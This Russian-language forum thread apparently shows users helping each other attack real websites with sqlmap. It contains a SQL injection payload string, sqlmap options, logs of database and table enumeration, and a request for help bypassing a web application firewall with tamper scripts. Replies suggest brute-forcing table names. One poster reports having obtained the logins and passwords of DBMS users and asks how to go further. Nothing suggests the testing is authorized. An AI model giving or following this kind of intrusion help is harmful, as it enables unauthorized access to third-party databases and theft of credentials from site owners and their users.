Самому выбрать подходящий пэйлоад нельзя, но в вашем логе был еррор-басед вектор, поэтому вы можете указать тип инъекции, дописав --technique=E
Была как то раз такая задача. Указывал место инъекции через * (навроде ?id=334'+OR+'24'='24'+*+--+) а для выбора пейлоада пришлось править XML, где эти пейлоады прописаны.
Спасибо, я получил логины и пароли пользователей СУБД, как их использоватьвместе с SQLmap -ом,что дальше делать то))
[10:21:10] [INFO] fetching tables for database: pinc [10:21:10] [INFO] the SQL query used returns 291 entries [10:21:10] [INFO] starting 10 threads [10:21:11] [INFO] heuristics detected web page charset 'ascii' Database: pincY3mc7_aqwert [1 table] +-----------+ | UpText | +-----------+ [10:21:37] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 291 times, 500 (Internal Server Error) - 1 times Не получается получить все таблицы
[15:22:19] [INFO] fetched random HTTP User-Agent header from file 'C:\sqlmap-mas ter\txt\user-agents.txt': 'Opera/7.23 (Windows 98; U) [en]' [15:22:19] [INFO] testing connection to the target URL [15:22:19] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests [15:22:19] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS [15:22:19] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [15:22:22] [CRITICAL] WAF/IDS/IPS identified as 'Generic (Unknown)'. Please cons ider usage of tamper scripts (option '--tamper') are you sure that you want to continue with further target testing? [y/N] Подскажите пож-та как обойти Waf Generic ?
я тоже не знаю какой тампер использовать, хз что это за waf, может для него тампера вообще нет надо разбираться как работает этот waf и тогда уже можно думать какие тамперы использовать пью растворимый кофе, гущи нет, хз что это за generic
web application technology: Nginx back-end DBMS: MySQL >= 5.5 banner: '5.5.44-0+deb7u1' [20:47:43] [INFO] fetching database names [20:47:43] [WARNING] the SQL query provided does not return any output [20:47:43] [INFO] fetching number of databases [20:47:43] [WARNING] (case) time-based comparison requires larger statistical mo del, please wait.............................. (done) [20:47:44] [WARNING] it is very important to not stress the network adapter duri ng usage of time-based payloads to prevent potential disruptions [20:47:44] [ERROR] unable to retrieve the number of databases [20:47:44] [INFO] falling back to current database [20:47:44] [INFO] fetching current database [20:47:44] [INFO] resumed: martin available databases [1]: [*] martin [20:47:44] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 1 times Не могу получить таблицы
"available databases" говорит что доступа к information_schema нет, не удивительно что списка баз/таблиц нету) брутфорс имхо, скульмап вроде это даже умеет ---------------------- хотя не исключаю что может быть какой то waf -v 3 в помощь
как решить?) [CRITICAL] unable to connect to the target URL ('Connection reset by peer'). sqlmap is going to retry the request(s)
